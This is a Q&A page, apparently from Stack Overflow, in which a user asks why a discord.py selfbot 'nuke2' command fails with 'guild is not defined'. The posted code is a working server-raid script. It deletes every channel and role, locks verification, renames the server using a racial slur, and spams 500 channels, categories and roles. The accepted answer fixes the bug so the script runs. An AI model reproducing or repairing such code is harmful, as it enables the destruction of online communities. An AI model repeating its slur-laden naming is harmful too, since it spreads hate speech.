# Why is guild not defined | discord.py

Tags: python, discord.py

Hello there I'm a newbie developer and is creating tools for people which most are for educational purposes and I have made a selfbot for personal use and I created a second version of the nuke command in the code for some reason it kept saying "guild is not defined" I don't know how to solve this error if you know how to please answer my question

The code

````
@client.command()
async def nuke2(ctx):  
    await ctx.message.delete()
    print(f"Nuking the guild.")
    for channel in ctx.guild.channels:
        try:
           await channel.delete()
           print(Fore.GREEN+f"CHANNEL: a channel deleted")
        except:
           print(Fore.RED+f"CHANNEL: Couldn't delete a channel")
    for role in ctx.guild.roles:
        try:
            await ctx.role.delete()
            print(Fore.GREEN+f"ROLE: role deleted")
        except:
            print(Fore.RED+f"ROLE: Couldn't delete a role")
    await ctx.guild.edit(default_notifications=discord.NotificationLevel.all_messages,verification_level=discord.VerificationLevel.extreme ,name=f"{guild.id}chingchongniggerserver{guild.id}", icon=None)
    for x in range(500):
        await ctx.guild.create_text_channel(name="WIZZED BY DEATH X")
        await ctx.guild.create_voice_channel(name="WIZZED BY DEATH X")
        await ctx.guild.create_category(name="WIZZED BY DEATH X")
    for x in range(500):
        await ctx.guild.create_role(name="WIZZED BY DEATH X")
    return```

I can't send what the error looks like when running it since the python said the error code is on site-packages/discord so please solve this
````

Answer (score 3, accepted):

You should use `ctx.guild` instead of `guild` in

```py
name=f"{guild.id}chingchongniggerserver{guild.id}"
```

Comment: Oh I kept forgetting it was ctx.guild not guild thank you by the way